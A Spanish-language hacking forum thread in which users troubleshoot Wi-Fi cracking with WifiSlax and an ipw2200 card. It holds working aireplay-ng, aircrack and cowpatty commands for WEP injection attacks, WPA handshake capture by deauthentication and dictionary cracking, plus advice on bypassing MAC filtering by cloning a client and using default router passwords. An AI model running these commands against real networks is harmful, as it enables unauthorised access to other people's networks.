elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
29 Mayo 2012, 05:11  


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux (Moderadores: Uxio, pianista, ChimoC)
| | | |-+  MANUAL IPW2200+WIFISLAX 3.1
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: MANUAL IPW2200+WIFISLAX 3.1  (Leído 48,962 veces)
NeOdEaTh

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #15 en: 23 Noviembre 2007, 13:04 »

enhorabuena!! jeje, yo siempre utilizo el aircrack-ptw......si utilizas wifislax 3.1 no deberías tener problemas.... normalmente es aircrack-ptw captura-01.cap   de todas formas mira a ver el nombre exacto que le has puesto a la captura y el error que te da...un saludo!


En línea
ChinoTauro

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #16 en: 23 Noviembre 2007, 13:44 »

gracias!!
no me da ningún error, simplemente no encuentra la clave.


En línea
maximoo

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #17 en: 25 Noviembre 2007, 15:26 »

Hola a todos,llevo poco tiempo por aqui por lo que os rogaria algo de paciencia con mis ineptitudes... :rolleyes:
Ya he hecho mis pinitos de auditoria web en entorno windows con CommView y no he tenido ningun tipo de problema y he decidido dar el salto a linux, pero poco a poco asi que me he decantado por wifislax.

Os cuento como he seguido el manual a ver si me podeis decir en que he fallado.
Antes de nada decir que:
AP:AP:AP:AP:AP:AP=MAC del Punto de Acceso
MS:MS:MS:MS:MS:MS=MAC de mi estacion ya falseada.

1)DRIVER:Tras recargar el driver de la aplicacion del menu del wifislax parte de los resultados son los siguientes...

Código:
....
eth1      unassociated  ESSID:off/any
          Mode:Managed  Channel=0  Access Point: Not-Associated
          Bit Rate:0 kb/s   Tx-Power=20 dBm   Sensitivity=8/0
          Retry limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

rtap0     no wireless extensions.

2)ESCANEO DE REDES:Aparece mi red con todos sus datos.

3)CAPTURA:Salen las redes disponibles aunque solo se incrementa el numero de beacons de mi red.
Creo que esto va bien.

4)Al tener solo un portatil no me quedaba otra manera que el ATAQUE SIN CLIENTES: Antes de nada hago el paso de cambiar la MAC
Primero he probado la opcion 1+4, porque he leido que deducido de los comentarios que es la mas efectiva en este caso.
Ataque 1: Creo que funciona correctamente.

Código:
iwconfig eth1 essid WLAN_XX key 1111111111111 channel 6
wifislax ~ # iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

eth1      IEEE 802.11g  ESSID:"WLAN_XX"
          Mode:Managed  Frequency:2.437 GHz  Access Point: AP:AP:AP:AP:AP:AP
          Bit Rate:54 Mb/s   Tx-Power=20 dBm   Sensitivity=8/0
          Retry limit:7   RTS thr:off   Fragment thr:off
          Encryption key:0111-1111-1111-1100-0000-0000-00   Security mode:open
          Power Management:off
          Link Quality=50/100  Signal level=-71 dBm  Noise level=-88 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:23

rtap0     no wireless extensions.

Cuando hago ataque 4: si introduzco el comando que aparece en el manual me da error.

Código:
aireplay-ng -4 -a -b AP:AP:AP:AP:AP:AP -h MS:MS:MS:MS:MS:MS -i rtap0 eth1
Invalid AP MAC address.
"aireplay-ng --help" for help.

He consultado la ayuda que ofrece y he visto que como parametro de -a va el bssid del AP.

Código:
wifislax ~ # aireplay-ng -4 -a AP:AP:AP:AP:AP:AP -b AP:AP:AP:AP:AP:AP -h MS:MS:MS:MS:MS:MS -i rtap0 eth1
Read 2000 packets...

En ningun momento me ha preguntado nada de ningun paquete como decia el manual.
El numero de paquetes iba aumentando, he aguantado hasta 10000 pero seguia y veia que no paraba nunca, por lo que no podia continuar con este ataque.

He probado el 1+3 entonces. El ataque 1 ha sido igual que el anterior.

Cuando hago ataque 3

Código:
aireplay-ng -3 -x 1024 -g 1000000 -b AP:AP:AP:AP:AP:AP -h MS:MS:MS:MS:MS:MS -i rtap0 eth1
Saving ARP requests in replay_arp-1125-140837.cap
You should also start airodump-ng to capture replies.
Read 600 packets (got 0 ARP requests), sent 0 packets...(0 pps)

El numero iba aumentado pero en la shell donde estoy capturando el numero de #Data seguia a 0,he probado a cambiarle el rate a la tarjeta pero no me ha dejado.

Gracias.

P.D.:El acceso al servicio de internet por filtrado MAC en el router es 100% efectivo? o falseando la MAC a las que tengo filtradas pueden acceder a internet?




En línea
NeOdEaTh

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #18 en: 25 Noviembre 2007, 16:30 »

hola, por lo que veo te asocias bien al AP. El siguiente paso es el ataque 3 o el 4...el chop chop tiene un error.....sería: aireplay-ng -4 -a AP:AP:AP:AP:AP:AP -h MS:MS:MS:MS:MS:MS -i rtap0 eth1

con eso ya debería ir bien....a mi tb me ha pasado lo mismo que tu algunas veces con el A4. Si funciona todo es muy rápido. En cuanto al ataque 3, debes esperar....y esperar, hasta que encuentre un ARP válido para reinyectar....puede que dure segundos o minutos....a mi alguna vez me ha tardado como 10minutos. Va leyendo paquetes, pero hasta que no encuntra ninguno no reinyecta.

El filtrado MAC es efectivo....si, pero claro está, si vemos que mac está asociada al AP, la clonamos, hacemos ataque1, entonces el cliente verdadero caerá, y ya podemos sacar la clave. Con nuestra clave ya podemos entrar en el router por ejemplo si no se ha cambiado el pass por defecto y meter nuestra mac también dentro del filtrado... Está claro que lo mejor es clave WPA.

Un saludo
En línea
NeOdEaTh

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #19 en: 25 Noviembre 2007, 20:00 »

perdón, el A4 sería: aireplay-ng -4 -b AP:AP:AP:AP:AP:AP -h MS:MS:MS:MS:MS:MS -i rtap0 eth1

otra cosa interesante antes de empezar, si teneis un led para ver si está conectado la wireless y tal en el portatil... para que funcione en linux debeis poner:

modprobe -r ipw2200
modprobe ipw2200 mode=0 qos_enable=1 led=1

un saludo ;)
En línea
maximoo

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #20 en: 25 Noviembre 2007, 22:10 »

Ok,mañana probaré el ataque 4.Esta tarde he probado el ataque 3 y despues de 102.000 paquetes leidos no ha sacado ningun ARP  :-\

Saludos.
En línea
bikford

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #21 en: 27 Noviembre 2007, 11:50 »

Hola a todos a mi me va todo perfecto uso el airodump (me da palo escribir je je)..pero lo que me pasa en que con el portatil con la ipw2200 no me deja poner la mac 11:22:33:44:55:66 da error.
entonces si quiero hacer el ataque x cliente falso no se asocia nunca ya que la que deja poner es la 00:11:22.... o la 00:01:02:........
no hay manera se hacer alguna modificacion al airodump para que no haga la asociacion falsa con 11:22:33:44:55:66:.


gracias
En línea
hewart

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #22 en: 1 Diciembre 2007, 12:35 »

Hola bikford

Yo también soy nuevo por aquí. Espero poder responder correctamente  ;D

Según tengo entendido, las MAC que te puedes asignar sólo pueden empezar con 00

Para solucionar incompatibilidades con airoscript por el tema MAC, puedes ejecutar los comandos a mano  ;)

Espero haberte sido de ayuda
Corrijanme si no estoy en lo cierto :-\
En línea
mtascon

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #23 en: 17 Diciembre 2007, 03:08 »

Hola a todos!!!

Estoy tratando de hacer un ataque 0 con una tarjeta intel pro wireless 2915 de chipset ipw 2200 con el objetivo de obtener la clave wpa, pero resulta que envia los mensajes de deautenticacion pero no logro obtener el handshake de esta manera, la unica manera de obtenerlo es volviendo a autenticar el cliente manualmente.

estos son los pasos que estoy siguiendo

airodump-ng rtap0

airodump-ng -b MAC_AP -c 6 -w wpa rtap0

aireplay-ng -0 30 -a MAC_AP -c MAC_cliente eth3

aircrack-ng wpa*.cap

paro el airodump

genpmk -f dictio.txt -d hashfile-wpa -s SSID

cowpatty -r wpa-01.cap -d hashfile-wpa -s SSID

les agradeceria la ayuda que me puedan ofrecer
En línea
pep_dj

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #24 en: 26 Enero 2010, 10:00 »

Siento "revivir" un post tan antiguo... ¿Alguien podría ayudarme a hacer un ataque A0 con una ipw2200?.

Estoy haciendo pruebas para obtener el nombre de un ESSID oculto, pero no consigo lanzar correctamente dicho ataque...
En línea
ChimoC
Por la libertad y contra el terrorismo
Moderador
***
Desconectado Desconectado

Mensajes: 4.779


Paz, dignidad y justicia


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #25 en: 26 Enero 2010, 15:41 »

Buenas:

Creo recordar que NO permite A0

Un saludo

ChimoC
En línea

pep_dj

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: MANUAL IPW2200+WIFISLAX 3.1
« Respuesta #26 en: 26 Enero 2010, 16:24 »

Gracias por tu respuesta ChimoC. ¿No hay otra forma de saber el nombre de la red? He leído que se puede con kismet, pero que no siempre sirve.
En línea
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines